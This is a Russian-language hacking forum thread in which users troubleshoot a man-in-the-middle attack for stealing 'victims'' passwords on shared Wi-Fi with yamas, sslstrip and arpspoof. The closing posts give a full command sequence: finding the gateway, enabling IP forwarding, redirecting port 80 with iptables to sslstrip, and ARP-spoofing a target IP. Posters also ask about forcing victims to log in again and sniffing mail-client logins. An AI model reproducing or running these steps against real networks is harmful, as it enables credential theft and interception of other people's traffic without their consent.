Не нужно его впихивать на флешку. Зайди из под BT5 и скачай его с сайта. А дальше все делай по инструкции в видео.
Спасибо разобрался, только вот не пойму пока как конкретный выбрать IP для скана.Например весит 5 человек, а мне надо например одного из них, а я не пойму как его вычислить когда нет списка IP? Может у меня что то не так в настройках? А можешь по подробнее об этом способе объяснить? И еще -скажи, в этом варианте ты сканируешь весь траффик чела как в intercepter-ng, то есть ты видишь какие он страницы посещает или только пассы приходят???
В зависимости от настроек (с каким ключом запущен sslstrip) напиши в терминале "sslstrip - h" это хелп, там несколько простых команд. Далее оно записывает весь лог в файл sslstrip.log, просматривай его и ищи то что тебе надо.
поставил и настроил yamas, всё работает, пароли сниффит, но проблема в том, что сайты стали очень долго грузиться на компьютере жертвы. Я подумал, что это из-за того, что снифится через допотопный нетбук, верно ли, что если сниффить с помощью мощного ноута, грузиться будет быстрее? и еще подскажите пожалуйста как сниффить логин/пароль почты, если юзер работает через почтовый клиент
Нет, тут дело не в мощности железа. Я только начинающий в этой теме но как понимаю что явных причин 2: Оборудование - сам сетевой адаптер (вай фай модуль) и настройки самого ARP-spoofing'a (тоесть тайм-ауты атак и прочее). По поводу почтового клиента - не подскажу т.к. не сталкивался.
А как долго в yamas нужно ждать пароли? Там нет такой функции типа деунтификации или другими словами Cookie killer ? Когда разъединяешь принудительно и жертва пытается опять войти и в этот момент нужно схапать пасс? Если ждать когда он самовольно раз в сутки зайдет куда то так вечная вечность пройдет.
Такой же скрипт и результат 0 ! Все запускаю правильно, как на многих видео. Какой пароль на параллеьном компе не ввиду ни чего не отображается, хуже того еще начинает так тупить, что даже страницы не открываются! Если как тут писали, может это обновленная версия и у нее глюк? Где взять удачной конфигурации версию? Может в какие то я подводные камни не предусмотрел, парни натолкните меня на путь истинный.
Неужели никто не сталкивался с подобной проблемой? YAMAS скрипт последней версии кто нибудь реально юзал? Вешаю 2 компа на один роутер, с одного запускаю точь так как на видео YAMAS бомбить второй комп, результата 0! Как насчет пассов, у меня что то ни чего он не находит, притом комп начинает так тупить и браузер ни хрена не открывает! Может кто нить все таки растолкует где собака порылась, в чем проблемка может быть. Уже неделю сижу а воз и ныне там.(((((
Marlinseaway, я сталкивался с тем, что на некоторых видео показыватся процесс настройки неправильно, как на этом скриншоте http://rghost.ru/52379565 Это надо поправить изменив путь хранения sslstrip, но я просто снес его и поставил в ту папку, в которой он ищет, там смотри внимательно есть share в root и есть share в usr это еще глубже по каталогам, вот туда надо поставить и команду chmod 777 для всей папки, где sslstrip хранится и всё пойдет, по крайней мере у меня так, пароли приходят , но инет всё равно тупить начинает когда подключаешься
попробуй в связке запустить sslstrip + arpspoof из под kali или BT5. Это единственный вариант на данный момент который не вешает инет жертвы и перехватывает его трафик и пароли.
А можете пошагово растолковать как это сделать? Что скачать, куда установить и как запустить. А то в голове уже каша всего, чего я только уже не пробовал. Можно в личку, чтоб форум не засирать, если конечно вам не в тягость...Спасибо
Вот жеж пошаговая инструкция, первый пост к этой теме. Я по ней все делал и все получилось. http://forum.antichat.ru/showpost.php?p=3232503&postcount=1
Пробовал я и этот вариант , но так и не понял как понять какой у мне порт нужно прописывать Настраиваем IPtables для перенаправления интернет трафика (с 80 порта на любой другой, у меня это 6000 порт) : Где посмотреть на какой мне нужно перенаправлять порт???
Ты перенаправляешь с 80 порта на любой другой (который сам задаешь) Code: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6000 - эта команда задает перенаправление трафика с порта 80 на порт 6000 (вместо 6000 можно написать любой другой порт) Code: sslstrip -l 6000 А эта команда запускает sslstrip на прослушку заданного тобой выше порта. Тоесть ты задал командой iptables перенаправление с порта 80 на 6000 а потом запустил sslstrip на прослушку порта 6000. Теперь ты перехватываешь весь трафик. Понятно?)
Все это хорошо, но после команды echo "1" > /proc/sys/net/ipv4/ip_forward у меня все стоит и ни чего не происходит((
root@bt:~# tar zxvf sslstrip-0.9.tar.gz sslstrip-0.9/ sslstrip-0.9/README sslstrip-0.9/COPYING sslstrip-0.9/setup.py sslstrip-0.9/sslstrip/ sslstrip-0.9/sslstrip/StrippingProxy.py sslstrip-0.9/sslstrip/SSLServerConnection.py sslstrip-0.9/sslstrip/ServerConnectionFactory.py sslstrip-0.9/sslstrip/ClientRequest.py sslstrip-0.9/sslstrip/ServerConnection.py sslstrip-0.9/sslstrip/CookieCleaner.py sslstrip-0.9/sslstrip/__init__.py sslstrip-0.9/sslstrip/DnsCache.py sslstrip-0.9/sslstrip/URLMonitor.py sslstrip-0.9/lock.ico sslstrip-0.9/sslstrip.py root@bt:~# cd sslstrip-0.9 root@bt:~/sslstrip-0.9# sudo python ./setup.py install running install running build running build_py running build_scripts copying and adjusting sslstrip/sslstrip -> build/scripts-2.6 running install_lib running install_scripts copying build/scripts-2.6/sslstrip -> /usr/local/bin changing mode of /usr/local/bin/sslstrip to 755 running install_data running install_egg_info Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info Cleaning up... root@bt:~/sslstrip-0.9# netstat -nr Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0 root@bt:~/sslstrip-0.9# echo "1" > /proc/sys/net/ipv4/ip_forward root@bt:~/sslstrip-0.9# Вот как то так и стоит(( Что не так не пойму, все команды скопированы и по порядку запущенны??
Тяжело разобрать где это все искать, не судите меня за тупость,. А по проще, а то там снести, туда поставить,где эта папка root я что то запарился ее в ВТ5 искать. А как это сделать-поставить команду на папку chmod 777 ?
Ничего и не должно произойти. 1ым делов терминале ты пишешь Code: netstat -nr этой командой ты узнаешь IP шлюза. Тоесть твоего роутера. Дальше в том же терминале Code: echo "1" > /proc/sys/net/ipv4/ip_forward (ничего произойти не должно, просто прописались настройки) В том же окне настроивешь IP Tables. Code: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6000 (после этой команды о5 же ничего произойти не должно) и дальше в этом же терминале запускаешь sslstrip на прослушку заданного тебе порта Code: sslstrip -l 6000 (после этой команды будет написано в терминале что-то типа running sslstrip 0.9 by ..... ) Все. Sslstrip запущен. Это окно больше не трогаешь. Открываешь новый терминал и пишешь там Code: arpspoof -i wlan0 -t 192.168.0.103 192.168.0.1 где wlan0 - твой адаптер wi-fi 192.168.0.103 - IP жертвы 192.168.0.1 - IP шлюза(роутера) запускаешь, в этом же окне начнут появляться строки с интервалом 2-3 секнуды. ARP-spoof пошел. оба терминала не трогаешь. Когда жертва будет ходить по сайтам или проходить авторизацию в окне где запущен sslstrip будут появляться новые строки. Это признак того что все настроено правильно и работает как надо.